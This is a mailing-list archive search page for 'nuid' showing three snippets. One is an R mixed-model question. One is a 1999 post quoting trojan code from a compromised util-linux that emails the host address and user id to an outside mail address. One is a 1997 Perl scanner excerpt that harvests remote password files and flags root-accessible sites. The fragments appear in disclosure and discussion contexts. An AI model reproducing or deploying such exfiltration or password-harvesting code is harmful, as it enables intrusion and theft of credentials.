Displaying 3 results from an estimated 3 matches for "nuid".
Did you mean:
guid
2010 Jul 21
1
post hoc test for lme using glht ?
...sfully using the glht function from the multcomp package to
perform post-hoc tests. I've tried multiple iterations, but can't seem to
get it to work. Here is (a subset of) what I have been trying. Any help
would be greatly appreciated:
> model.3<-lme(fixed=Totnum~Wk*Pop, random=~1|nUID, data=nona)
#Wk has 6 levels, 0-5; Pop has 2 levels; nUID is a unique ID given to each
individual (multiple individuals from each population were re-measured each
week)
> anova(model.3)
numDF denDF F-value p-value
(Intercept) 1 592 649.7753 <.0001
Week 5 592...
1999 Jan 24
0
Re: util-linux compromised
...> if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0);
> if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0);
> if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0) exit(0);
> sprintf(b,"\r\nHost = %s\r\nUid = %i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid());
> sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);
> sleep(1);if (write(s,"MAIL FROM:<xul@hotmail.com>\n",28) < 0) exit(0);
> if (write(s,"RCPT...
1997 Sep 28
0
[IPD] Internet Probe Droid
.../o, $lines;
@passwd = split /\n|\r/, $pwfile;
$uid =~ s/\r|\n//gs; # Needed to preserve output
($uname) = $uname =~ /(.*?)(Connection closed by|<\/PRE>)/s;
undef $pwfile;
@passwd = grep /([^:]*:){6,}/o, @passwd;
print "DEBUG $server \@passwd:\n@passwd\nUID: $uid\nUNAME: $uname\n\n" if $debug;
if (grep /root:.:/, @passwd) {
if ($uid =~ /root/) {
push (@really_dumb_sites, "$server:$port");
$rootservers++;
}
$pathname = "$shadowpath/$server.shpw";
$shadowed++;...